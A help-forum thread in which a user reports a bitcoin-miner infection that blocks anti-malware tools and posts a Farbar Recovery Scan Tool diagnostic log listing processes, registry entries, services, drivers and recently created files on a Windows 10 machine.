
bitcoin miner

Posted: 11 Jan 2019 20:13
by ulol
Hi,
unfortunately, through my own stupidity, I managed to download and install malware, apparently a bitcoin miner.
When I noticed it, I immediately ran Malwarebytes Anti-Malware and it removed some files. Apparently not everything, though, because the next day after boot the malware blocked the anti-malware and it also blocks Chrome when I search for other anti-malware tools. So I ran Malwarebytes in safe mode and added AdwCleaner as well. Again it found several files, but the problem persists. I also used other anti-malware tools (HitmanPro), but that did not help. I am asking for advice; I am attaching the logs from Malwarebytes, AdwCleaner and FRST.

Thank you

Re: bitcoin miner

Posted: 11 Jan 2019 20:53
by Rudy
Hello!
If the FRST + Addition logs were taken before cleaning with AdwCleaner, please post these logs again.

Re: bitcoin miner

Posted: 11 Jan 2019 22:45
by ulol
Sorry, here are the latest logs

Thanks for the quick reply :)

Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version: 28.09.2018
Ran by Martin (administrator) on DESKTOP-VBSMI5O (12-01-2019 00:00:54)
Running from C:\Users\ulol\Desktop
Loaded Profiles: Martin (Available Profiles: defaultuser0 & Martin)
Platform: Windows 10 Home Version 1803 17134.523 (X64) Language: Čeština (Česko)
Internet Explorer Version 11 (Default browser: Chrome)
Boot Mode: Safe Mode (minimal)
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/33 ... scan-tool/

==================== Processes (Whitelisted) =================

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

(Malwarebytes) C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe
(Microsoft Corporation) C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.1812.3-0\MsMpEng.exe
(Malwarebytes) C:\Program Files\Malwarebytes\Anti-Malware\mbamtray.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
(Microsoft Corporation) C:\Windows\System32\smartscreen.exe
() C:\Program Files\WindowsApps\Microsoft.SkypeApp_14.36.52.0_x64__kzf8qxf38zg5c\SkypeBackgroundHost.exe
(Microsoft Corporation) C:\Windows\HelpPane.exe
() C:\Program Files\WindowsApps\Microsoft.Getstarted_6.15.12641.0_x64__8wekyb3d8bbwe\WhatsNew.Store.exe

==================== Registry (Whitelisted) ===========================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKLM\...\Run: [SecurityHealth] => C:\Program Files\Windows Defender\MSASCuiL.exe [638872 2018-04-12] (Microsoft Corporation)
HKLM\...\Run: [RtHDVCpl] => C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe [13885696 2015-06-24] (Realtek Semiconductor)
HKLM\...\Run: [StartCN] => C:\Program Files\AMD\CNext\CNext\cnext.exe [4926664 2016-02-26] (Advanced Micro Devices, Inc.)
HKLM\...\Run: [CDAServer] => C:\Program Files\Common Files\Common Desktop Agent\CDASrv.exe [464608 2014-09-08] ()
HKLM-x32\...\Run: [NetTime] => C:\Program Files (x86)\NetTime\NetTime.exe [772096 2012-05-12] ()
HKLM-x32\...\Run: [StartCCC] => C:\Program Files (x86)\AMD\ATI.ACE\Core-Static\amd64\CLIStart.exe [767176 2015-08-04] (Advanced Micro Devices, Inc.)
HKU\S-1-5-19\...\RunOnce: [WAB Migrate] => C:\Program Files\Windows Mail\wab.exe [518144 2018-04-12] (Microsoft Corporation)
HKU\S-1-5-20\...\RunOnce: [WAB Migrate] => C:\Program Files\Windows Mail\wab.exe [518144 2018-04-12] (Microsoft Corporation)
HKU\S-1-5-21-195099987-321758953-278711717-1001\...\Run: [BlueStacks Agent] => C:\Program Files (x86)\BlueStacks\HD-Agent.exe [160824 2017-05-24] (BlueStack Systems, Inc.)
HKU\S-1-5-21-195099987-321758953-278711717-1001\...\MountPoints2: {4fc3e674-a3f9-11e8-b924-50b7c3b63006} - "E:\HiSuiteDownLoader.exe"
HKU\S-1-5-21-195099987-321758953-278711717-1001\...\MountPoints2: {84ec38e4-b5a9-11e8-b92a-20898411baf6} - "E:\HiSuiteDownLoader.exe"
HKU\S-1-5-21-195099987-321758953-278711717-1001\...\MountPoints2: {84ec39f6-b5a9-11e8-b92a-20898411baf6} - "E:\HiSuiteDownLoader.exe"
HKU\S-1-5-21-195099987-321758953-278711717-1001\...\MountPoints2: {df1b3e25-3b2c-11e8-b912-50b7c3b63006} - "E:\HiSuiteDownLoader.exe"
HKU\S-1-5-21-195099987-321758953-278711717-1001\...\MountPoints2: {f6086f2d-f889-11e8-b934-50b7c3b63006} - "E:\HiSuiteDownLoader.exe"
HKU\S-1-5-21-195099987-321758953-278711717-1001\...\MountPoints2: {f608762c-f889-11e8-b934-50b7c3b63006} - "E:\HiSuiteDownLoader.exe"

==================== Internet (Whitelisted) ====================

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

Hosts: Hosts file not detected in the default directory
Tcpip\Parameters: [DhcpNameServer] 192.168.1.1
Tcpip\..\Interfaces\{430db6d2-4242-4c4a-bd0e-6f4a3369534d}: [DhcpNameServer] 192.168.1.1
Tcpip\..\Interfaces\{942faac3-3e9a-472d-9cf4-c30e16d1a17b}: [DhcpNameServer] 192.168.1.1

Internet Explorer:
==================
SearchScopes: HKU\S-1-5-21-195099987-321758953-278711717-1001 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
BHO: Lync Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files (x86)\Microsoft Office\root\VFS\ProgramFilesX64\Microsoft Office\Office16\OCHelper.dll [2018-11-22] (Microsoft Corporation)
BHO: Microsoft OneDrive for Business Browser Helper -> {D0498E0A-45B7-42AE-A9AA-ABA463DBD3BF} -> C:\Program Files (x86)\Microsoft Office\root\VFS\ProgramFilesX64\Microsoft Office\Office16\GROOVEEX.DLL [2018-12-21] (Microsoft Corporation)
BHO-x32: Lync Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files (x86)\Microsoft Office\root\Office16\OCHelper.dll [2018-07-17] (Microsoft Corporation)
BHO-x32: Microsoft OneDrive for Business Browser Helper -> {D0498E0A-45B7-42AE-A9AA-ABA463DBD3BF} -> C:\Program Files (x86)\Microsoft Office\root\Office16\GROOVEEX.DLL [2018-12-21] (Microsoft Corporation)
Handler-x32: mso-minsb-roaming.16 - {83C25742-A9F7-49FB-9138-434302C88D07} - C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSB.DLL [2018-07-17] (Microsoft Corporation)
Handler-x32: mso-minsb.16 - {42089D2D-912D-4018-9087-2B87803E93FB} - C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSB.DLL [2018-07-17] (Microsoft Corporation)
Handler-x32: osf-roaming.16 - {42089D2D-912D-4018-9087-2B87803E93FB} - C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSB.DLL [2018-07-17] (Microsoft Corporation)
Handler-x32: osf.16 - {5504BE45-A83B-4808-900A-3A5C36E7F77A} - C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSB.DLL [2018-07-17] (Microsoft Corporation)

FireFox:
========
FF DefaultProfile: fcg8p7lh.default
FF ProfilePath: C:\Users\ulol\AppData\Roaming\Mozilla\Firefox\Profiles\fcg8p7lh.default [2019-01-12]
FF Plugin: @videolan.org/vlc,version=2.2.4 -> C:\Program Files\VideoLAN\VLC\npvlc.dll [2018-08-10] (VideoLAN)
FF Plugin: @videolan.org/vlc,version=3.0.4 -> C:\Program Files\VideoLAN\VLC\npvlc.dll [2018-08-10] (VideoLAN)
FF Plugin-x32: @microsoft.com/Lync,version=15.0 -> C:\Program Files (x86)\Microsoft Office\root\VFS\ProgramFilesX86\Mozilla Firefox\plugins\npmeetingjoinpluginoc.dll [2018-07-17] (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\Program Files (x86)\Microsoft Office\root\Office16\NPSPWRAP.DLL [2018-07-17] (Microsoft Corporation)
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.33.23\npGoogleUpdate3.dll [2018-12-20] (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.33.23\npGoogleUpdate3.dll [2018-12-20] (Google Inc.)
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AIR\nppdf32.dll [2018-12-04] (Adobe Systems Inc.)

Chrome:
=======
CHR HomePage: Default -> hxxp://www.seznam.cz/
CHR StartupUrls: Default -> "hxxps://www.google.com/","hxxps://www.google.com/"
CHR Session Restore: Default -> is enabled.
CHR Profile: C:\Users\ulol\AppData\Local\Google\Chrome\User Data\Default [2019-01-12]
CHR Extension: (Překladač Google) - C:\Users\ulol\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapbdbdomjkkjkaonfhkkikfgjllcleb [2017-10-20]
CHR Extension: (Dokumenty) - C:\Users\ulol\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2017-10-13]
CHR Extension: (Disk Google) - C:\Users\ulol\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2017-02-01]
CHR Extension: (CLONE, BOUNTY HUNTER, STORM TROOPER) - C:\Users\ulol\AppData\Local\Google\Chrome\User Data\Default\Extensions\bimnpejnapnbhiphakfmkhnnaoemofbe [2017-02-01]
CHR Extension: (YouTube) - C:\Users\ulol\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2017-02-01]
CHR Extension: (Dokumenty Google offline) - C:\Users\ulol\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2018-08-23]
CHR Extension: (AdBlock) - C:\Users\ulol\AppData\Local\Google\Chrome\User Data\Default\Extensions\gighmmpiobklfepjocnamgkkbiglidom [2018-12-12]
CHR Extension: (Bandzone Downloader) - C:\Users\ulol\AppData\Local\Google\Chrome\User Data\Default\Extensions\kdolellaicjnehmfidkjkkehmkkapngp [2017-11-09]
CHR Extension: (Platby Internetového obchodu Chrome) - C:\Users\ulol\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2018-04-03]
CHR Extension: (Gmail) - C:\Users\ulol\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2017-02-01]
CHR Extension: (Chrome Media Router) - C:\Users\ulol\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2018-12-19]
CHR Profile: C:\Users\ulol\AppData\Local\Google\Chrome\User Data\System Profile [2017-11-18]
CHR HKU\S-1-5-21-195099987-321758953-278711717-1001\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [bbjllphbppobebmjpjcijfbakobcheof] - hxxps://clients2.google.com/service/update2/crx
CHR HKLM-x32\...\Chrome\Extension: [efaidnbmnnnibpcajpcglclefindmkaj] - hxxps://clients2.google.com/service/update2/crx

==================== Services (Whitelisted) ====================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

S3 BstHdAndroidSvc; C:\Program Files (x86)\BlueStacks\HD-Service.exe [387128 2017-05-24] (BlueStack Systems, Inc.)
S3 BstHdLogRotatorSvc; C:\Program Files (x86)\BlueStacks\HD-LogRotatorService.exe [369720 2017-05-24] (BlueStack Systems, Inc.)
S3 BstHdPlusAndroidSvc; C:\Program Files (x86)\BlueStacks\HD-Plus-Service.exe [406584 2017-05-24] (BlueStack Systems, Inc.)
S2 ClickToRunSvc; C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe [8522536 2018-12-10] (Microsoft Corporation)
S3 GoogleChromeElevationService; C:\Program Files (x86)\Google\Chrome\Application\71.0.3578.98\elevation_service.exe [443872 2018-12-12] (Google Inc.)
S2 HitmanProScheduler; C:\Program Files\HitmanPro\hmpsched.exe [136512 2019-01-11] (SurfRight B.V.)
S2 HuaweiHiSuiteService64.exe; C:\Program Files (x86)\HiSuite\HandSetService\HuaweiHiSuiteService64.exe [190784 2018-11-19] () [File not signed]
S2 igfxCUIService1.0.0.0; C:\WINDOWS\system32\igfxCUIService.exe [319096 2017-05-18] (Intel Corporation)
R2 MBAMService; C:\Program Files\Malwarebytes\Anti-Malware\mbamservice.exe [6347056 2018-09-19] (Malwarebytes)
S2 NetTimeSvc; C:\Program Files (x86)\NetTime\NetTimeService.exe [473088 2012-05-12] () [File not signed]
S2 Samsung Printer Dianostics Service; C:\WINDOWS\SysWOW64\\spdsvc.exe [499000 2016-07-17] ()
S4 ssh-agent; C:\WINDOWS\System32\OpenSSH\ssh-agent.exe [495616 2018-03-10] ()
S2 SynTPEnhService; C:\Program Files\Synaptics\SynTP\SynTPEnhService.exe [256120 2016-02-01] (Synaptics Incorporated)
S3 WdNisSvc; C:\ProgramData\Microsoft\Windows Defender\platform\4.18.1812.3-0\NisSrv.exe [3880120 2018-12-11] (Microsoft Corporation)
R2 WinDefend; C:\ProgramData\Microsoft\Windows Defender\platform\4.18.1812.3-0\MsMpEng.exe [114208 2018-12-11] (Microsoft Corporation)

===================== Drivers (Whitelisted) ======================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

S3 amdkmafd; C:\WINDOWS\System32\drivers\amdkmafd.sys [23240 2016-02-26] (Advanced Micro Devices, Inc.)
R0 amdkmpfd; C:\WINDOWS\System32\drivers\amdkmpfd.sys [79736 2017-09-20] (Advanced Micro Devices, Inc.)
S3 Andbus; C:\WINDOWS\System32\drivers\lgandbus64.sys [19456 2012-03-02] (LG Electronics Inc.)
S3 AndDiag; C:\WINDOWS\System32\drivers\lganddiag64.sys [27648 2012-03-02] (LG Electronics Inc.)
S3 AndGps; C:\WINDOWS\System32\drivers\lgandgps64.sys [27136 2012-03-02] (LG Electronics Inc.)
S3 AndNetDiag2; C:\WINDOWS\System32\drivers\lgandnetdiag264.sys [30720 2015-01-26] (LG Electronics Inc.)
S3 AndNetGps; C:\WINDOWS\System32\drivers\lgandnetgps64.sys [29184 2015-01-21] (LG Electronics Inc.)
S3 BstHdDrv; C:\Program Files (x86)\BlueStacks\HD-Hypervisor-amd64.sys [152672 2017-05-24] (BlueStack Systems)
S3 BstkDrv; C:\Program Files (x86)\BlueStacks\BstkDrv.sys [270904 2017-05-22] (Bluestack System Inc. )
S3 dg_ssudbus; C:\WINDOWS\System32\drivers\ssudbus.sys [130688 2016-07-22] (Samsung Electronics Co., Ltd.)
S3 edrsensor; C:\WINDOWS\System32\DRIVERS\edrsensor.sys [294000 2018-10-09] (BitDefender S.R.L. Bucharest, ROMANIA)
S3 ew_usbccgpfilter; C:\WINDOWS\System32\drivers\ew_usbccgpfilter.sys [18944 2018-11-19] (Huawei Technologies Co., Ltd.)
S3 hitmanpro37; C:\WINDOWS\system32\drivers\hitmanpro37.sys [55232 2019-01-11] ()
U5 hw_usbdev; C:\Windows\System32\Drivers\hw_usbdev.sys [116864 2018-11-19] (Huawei Technologies Co., Ltd.)
R3 MBAMSwissArmy; C:\WINDOWS\System32\Drivers\mbamswissarmy.sys [261032 2019-01-11] (Malwarebytes)
S3 Microsoft_Bluetooth_AvrcpTransport; C:\WINDOWS\system32\DRIVERS\Microsoft.Bluetooth.AvrcpTransport.sys [46592 2018-04-12] (Microsoft Corporation)
R3 RadioHIDMini; C:\WINDOWS\System32\drivers\RadioHIDMini.sys [32168 2015-07-16] (Windows (R) Win 7 DDK provider)
S3 rt640x64; C:\WINDOWS\System32\drivers\rt640x64.sys [886528 2000-01-01] (Realtek )
R3 RTSUER; C:\WINDOWS\system32\Drivers\RtsUer.sys [402136 2000-01-01] (Realsil Semiconductor Corporation)
R3 SmbDrvI; C:\WINDOWS\system32\DRIVERS\Smb_driver_Intel.sys [33960 2000-01-01] (Synaptics Incorporated)
S3 ssudcdf; C:\WINDOWS\System32\drivers\ssudcdf.sys [36608 2014-01-22] (DEVGURU Co., LTD.(www.devguru.co.kr))
S3 ssuddmgr; C:\WINDOWS\System32\drivers\ssuddmgr.sys [206080 2014-01-22] (DEVGURU Co., LTD.(www.devguru.co.kr))
S3 ssudobex; C:\WINDOWS\System32\drivers\ssudobex.sys [206080 2014-01-22] (DEVGURU Co., LTD.(www.devguru.co.kr))
S3 ssudqcfilter; C:\WINDOWS\System32\drivers\ssudqcfilter.sys [64640 2016-07-22] (QUALCOMM Incorporated)
S3 ssudrmnet; C:\WINDOWS\System32\drivers\ssudrmnet.sys [70400 2014-01-22] (DEVGURU Co., LTD.)
S3 ssudserd; C:\WINDOWS\System32\drivers\ssudserd.sys [206080 2014-01-22] (DEVGURU Co., LTD.(www.devguru.co.kr))
S3 ss_conn_usb_driver; C:\WINDOWS\System32\Drivers\ss_conn_usb_driver.sys [26368 2014-01-22] (DEVGURU Co., LTD.)
S3 usbbus; C:\WINDOWS\System32\drivers\lgx64bus.sys [17920 2014-11-17] (LG Electronics Inc.)
S3 UsbDiag; C:\WINDOWS\System32\drivers\lgx64diag.sys [28160 2014-11-21] (LG Electronics Inc.)
S3 UsbGps; C:\WINDOWS\System32\drivers\lgx64gps.sys [27136 2014-11-17] (LG Electronics Inc.)
S0 WdBoot; C:\WINDOWS\System32\drivers\wd\WdBoot.sys [46680 2018-12-11] (Microsoft Corporation)
S0 WdFilter; C:\WINDOWS\System32\drivers\wd\WdFilter.sys [330936 2018-12-11] (Microsoft Corporation)
S3 WdNisDrv; C:\WINDOWS\System32\drivers\wd\WdNisDrv.sys [62136 2018-12-11] (Microsoft Corporation)
U2 bddci; no ImagePath

==================== NetSvcs (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)


==================== One Month Created files and folders ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2019-01-11 23:59 - 2019-01-11 23:59 - 000261032 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\mbamswissarmy.sys
2019-01-11 23:24 - 2019-01-11 23:24 - 000012872 _____ (SurfRight B.V.) C:\WINDOWS\system32\bootdelete.exe
2019-01-11 23:07 - 2019-01-11 23:35 - 000055232 _____ C:\WINDOWS\system32\Drivers\hitmanpro37.sys
2019-01-11 23:01 - 2019-01-11 23:02 - 000007593 _____ C:\Users\ulol\AppData\Local\Resmon.ResmonCfg
2019-01-11 22:44 - 2019-01-11 22:44 - 000025200 _____ C:\Users\ulol\Desktop\frst.rar
2019-01-11 20:12 - 2019-01-11 20:12 - 000055127 _____ C:\Users\ulol\Desktop\logy.rar
2019-01-11 20:10 - 2019-01-11 20:12 - 000049304 _____ C:\Users\ulol\Desktop\Addition.txt
2019-01-11 20:07 - 2019-01-12 00:02 - 000015218 _____ C:\Users\ulol\Desktop\FRST.txt
2019-01-11 19:40 - 2019-01-11 19:34 - 000000000 ____D C:\Users\ulol\Desktop\logy
2019-01-11 19:33 - 2019-01-12 00:00 - 000000000 ____D C:\FRST
2019-01-11 19:19 - 2019-01-11 19:19 - 002414080 _____ (Farbar) C:\Users\ulol\Desktop\FRST64.exe
2019-01-11 19:04 - 2019-01-11 19:04 - 000000000 ____D C:\Users\ulol\Desktop\cce_2.5.242177.201_x32
2019-01-11 14:17 - 2019-01-11 14:17 - 000000000 ____D C:\Users\ulol\AppData\Roaming\adaware
2019-01-11 14:17 - 2019-01-11 14:17 - 000000000 ____D C:\Users\ulol\AppData\Local\AdAwareDesktop
2019-01-11 14:13 - 2019-01-11 14:13 - 000000000 ____D C:\Program Files (x86)\adaware
2019-01-11 14:12 - 2019-01-11 14:12 - 000000000 ____D C:\Users\ulol\AppData\Local\AdAwareUpdater
2019-01-11 14:12 - 2019-01-11 14:12 - 000000000 ____D C:\Program Files\Common Files\adaware
2019-01-11 14:11 - 2019-01-11 14:11 - 000000000 ____D C:\ProgramData\adaware
2019-01-11 14:10 - 2019-01-11 23:24 - 000000000 ____D C:\ProgramData\HitmanPro
2019-01-11 14:10 - 2019-01-11 14:10 - 000001958 _____ C:\Users\Public\Desktop\HitmanPro.lnk
2019-01-11 14:10 - 2019-01-11 14:10 - 000000000 ____D C:\Program Files\HitmanPro
2019-01-11 13:46 - 2019-01-11 23:59 - 000000214 _____ C:\WINDOWS\Tasks\CreateExplorerShellUnelevatedTask.job
2019-01-11 13:45 - 2019-01-12 00:00 - 000891156 _____ C:\WINDOWS\ntbtlog.txt
2019-01-11 13:34 - 2019-01-11 13:34 - 000000080 ___SH C:\bootTel.dat
2019-01-11 13:25 - 2019-01-11 13:55 - 000000000 ____D C:\AdwCleaner
2019-01-11 13:25 - 2019-01-11 13:25 - 007320272 _____ (Malwarebytes) C:\Users\ulol\Desktop\adwcleaner_7.2.6.0.exe
2019-01-11 11:32 - 2019-01-11 12:13 - 373444054 _____ C:\Users\ulol\Desktop\Vikings 5x17 - S05E17 CZ titulky v obraze.avi
2019-01-11 11:20 - 2019-01-11 11:20 - 006161408 _____ C:\Users\ulol\AppData\Local\dump007.dat
2019-01-11 11:19 - 2019-01-11 11:19 - 000003688 _____ C:\WINDOWS\System32\Tasks\kuaejfar
2019-01-11 11:19 - 2019-01-11 11:19 - 000003470 _____ C:\WINDOWS\System32\Tasks\gcknyzn
2019-01-11 11:19 - 2019-01-11 11:19 - 000000009 _____ C:\Users\ulol\rstr2.ini
2019-01-10 17:53 - 2019-01-10 17:53 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes
2019-01-10 17:53 - 2018-12-04 08:09 - 000152688 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\mbae64.sys
2019-01-10 17:46 - 2019-01-10 17:46 - 000000008 _____ C:\ProgramData\ts.dat
2019-01-10 17:46 - 2019-01-10 17:46 - 000000004 _____ C:\ProgramData\lock.dat
2019-01-10 17:46 - 2019-01-10 17:46 - 000000004 _____ C:\ProgramData\irw.atsd
2019-01-10 17:29 - 2019-01-10 17:29 - 000003604 _____ C:\WINDOWS\System32\Tasks\{C1E14D40-9F1F-EBBD-1E08-51865EAFA95A}
2019-01-10 17:29 - 2019-01-10 17:29 - 000000004 _____ C:\ProgramData\ext.dat
2019-01-10 17:29 - 2019-01-10 17:29 - 000000003 _____ C:\Users\ulol\AppData\Local\wbem.ini
2019-01-10 17:28 - 2019-01-10 17:22 - 000000000 ____D C:\Program Files (x86)\DCOL
2019-01-10 17:26 - 2019-01-10 17:26 - 000000000 ____D C:\Users\ulol\AppData\LocalLow\MAL
2019-01-10 17:12 - 2019-01-10 17:12 - 000057640 _____ C:\ProgramData\agent.uninstall.1547136713.bdinstall.v2.bin
2019-01-09 12:59 - 2019-01-01 14:46 - 012710912 _____ (Microsoft Corporation) C:\WINDOWS\system32\ieframe.dll
2019-01-09 12:59 - 2019-01-01 14:43 - 001364992 _____ (Microsoft Corporation) C:\WINDOWS\system32\bcastdvruserservice.dll
2019-01-09 12:59 - 2019-01-01 14:20 - 011902976 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ieframe.dll
2019-01-09 12:59 - 2019-01-01 08:14 - 001221432 _____ (Microsoft Corporation) C:\WINDOWS\system32\hvix64.exe
2019-01-09 12:59 - 2019-01-01 08:14 - 001029944 _____ (Microsoft Corporation) C:\WINDOWS\system32\hvax64.exe
2019-01-09 12:59 - 2019-01-01 08:14 - 000566568 _____ (Microsoft Corporation) C:\WINDOWS\system32\tcblaunch.exe
2019-01-09 12:59 - 2019-01-01 08:13 - 003292152 _____ (Microsoft Corporation) C:\WINDOWS\system32\combase.dll
2019-01-09 12:59 - 2019-01-01 08:13 - 001363536 _____ (Microsoft Corporation) C:\WINDOWS\system32\WinTypes.dll
2019-01-09 12:59 - 2019-01-01 08:12 - 009084216 _____ (Microsoft Corporation) C:\WINDOWS\system32\ntoskrnl.exe
2019-01-09 12:59 - 2019-01-01 08:12 - 007520104 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.Protection.PlayReady.dll
2019-01-09 12:59 - 2019-01-01 08:12 - 002765344 _____ (Microsoft Corporation) C:\WINDOWS\system32\iertutil.dll
2019-01-09 12:59 - 2019-01-01 08:12 - 002465792 _____ (Microsoft Corporation) C:\WINDOWS\system32\msxml6.dll
2019-01-09 12:59 - 2019-01-01 08:12 - 002421288 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\ntfs.sys
2019-01-09 12:59 - 2019-01-01 08:12 - 000268304 _____ (Microsoft Corporation) C:\WINDOWS\system32\browserbroker.dll
2019-01-09 12:59 - 2019-01-01 07:55 - 025856512 _____ (Microsoft Corporation) C:\WINDOWS\system32\edgehtml.dll
2019-01-09 12:59 - 2019-01-01 07:50 - 022715392 _____ (Microsoft Corporation) C:\WINDOWS\system32\mshtml.dll
2019-01-09 12:59 - 2019-01-01 07:50 - 004383744 _____ (Microsoft Corporation) C:\WINDOWS\system32\EdgeContent.dll
2019-01-09 12:59 - 2019-01-01 07:47 - 000808448 _____ (Microsoft Corporation) C:\WINDOWS\system32\EdgeManager.dll
2019-01-09 12:59 - 2019-01-01 07:47 - 000433152 _____ (Microsoft Corporation) C:\WINDOWS\system32\MusNotification.exe
2019-01-09 12:59 - 2019-01-01 07:45 - 007573504 _____ (Microsoft Corporation) C:\WINDOWS\system32\Chakra.dll
2019-01-09 12:59 - 2019-01-01 07:45 - 002368512 _____ (Microsoft Corporation) C:\WINDOWS\system32\WebRuntimeManager.dll
2019-01-09 12:59 - 2019-01-01 07:44 - 001549824 _____ (Microsoft Corporation) C:\WINDOWS\system32\lsasrv.dll
2019-01-09 12:59 - 2019-01-01 07:44 - 000894464 _____ (Microsoft Corporation) C:\WINDOWS\system32\webplatstorageserver.dll
2019-01-09 12:59 - 2019-01-01 07:44 - 000662528 _____ (Microsoft Corporation) C:\WINDOWS\system32\wlidprov.dll
2019-01-09 12:59 - 2019-01-01 07:44 - 000456192 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Graphics.Printing.Workflow.dll
2019-01-09 12:59 - 2019-01-01 07:43 - 001805312 _____ (Microsoft Corporation) C:\WINDOWS\system32\urlmon.dll
2019-01-09 12:59 - 2019-01-01 07:42 - 004939776 _____ (Microsoft Corporation) C:\WINDOWS\system32\wininet.dll
2019-01-09 12:59 - 2019-01-01 07:42 - 002247680 _____ (Microsoft Corporation) C:\WINDOWS\system32\wlidsvc.dll
2019-01-09 12:59 - 2019-01-01 07:42 - 001371136 _____ (Microsoft Corporation) C:\WINDOWS\system32\aadtb.dll
2019-01-09 12:59 - 2019-01-01 07:42 - 000717312 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Web.dll
2019-01-09 12:59 - 2019-01-01 07:41 - 001159680 _____ (Microsoft Corporation) C:\WINDOWS\system32\rpcss.dll
2019-01-09 12:59 - 2019-01-01 07:41 - 000505344 _____ (Microsoft Corporation) C:\WINDOWS\system32\edgeIso.dll
2019-01-09 12:59 - 2019-01-01 07:37 - 006571584 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Media.Protection.PlayReady.dll
2019-01-09 12:59 - 2019-01-01 07:37 - 002478664 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\combase.dll
2019-01-09 12:59 - 2019-01-01 07:37 - 002253696 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\iertutil.dll
2019-01-09 12:59 - 2019-01-01 07:37 - 001989040 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msxml6.dll
2019-01-09 12:59 - 2019-01-01 07:29 - 022016512 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\edgehtml.dll
2019-01-09 12:59 - 2019-01-01 07:22 - 019405312 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mshtml.dll
2019-01-09 12:59 - 2019-01-01 07:16 - 005775872 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Chakra.dll
2019-01-09 12:59 - 2019-01-01 07:15 - 005307392 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\d2d1.dll
2019-01-09 12:59 - 2019-01-01 07:15 - 000608768 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\EdgeManager.dll
2019-01-09 12:59 - 2019-01-01 07:14 - 004514816 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wininet.dll
2019-01-09 12:59 - 2019-01-01 07:13 - 001628160 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\urlmon.dll
2019-01-09 12:59 - 2019-01-01 07:12 - 000795648 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Security.Authentication.OnlineId.dll
2019-01-09 12:59 - 2018-12-19 05:49 - 000352768 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msrd3x40.dll
2019-01-09 12:58 - 2019-01-01 14:50 - 000064000 _____ (Microsoft Corporation) C:\WINDOWS\system32\iemigplugin.dll
2019-01-09 12:58 - 2019-01-01 14:47 - 000225792 _____ (Microsoft Corporation) C:\WINDOWS\system32\windowslivelogin.dll
2019-01-09 12:58 - 2019-01-01 14:45 - 000714752 _____ (Microsoft Corporation) C:\WINDOWS\system32\wlidcli.dll
2019-01-09 12:58 - 2019-01-01 14:45 - 000285184 _____ (Microsoft Corporation) C:\WINDOWS\system32\wlidcredprov.dll
2019-01-09 12:58 - 2019-01-01 14:20 - 000165888 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\windowslivelogin.dll
2019-01-09 12:58 - 2019-01-01 14:18 - 000500736 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wlidcli.dll
2019-01-09 12:58 - 2019-01-01 14:17 - 000231936 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wlidcredprov.dll
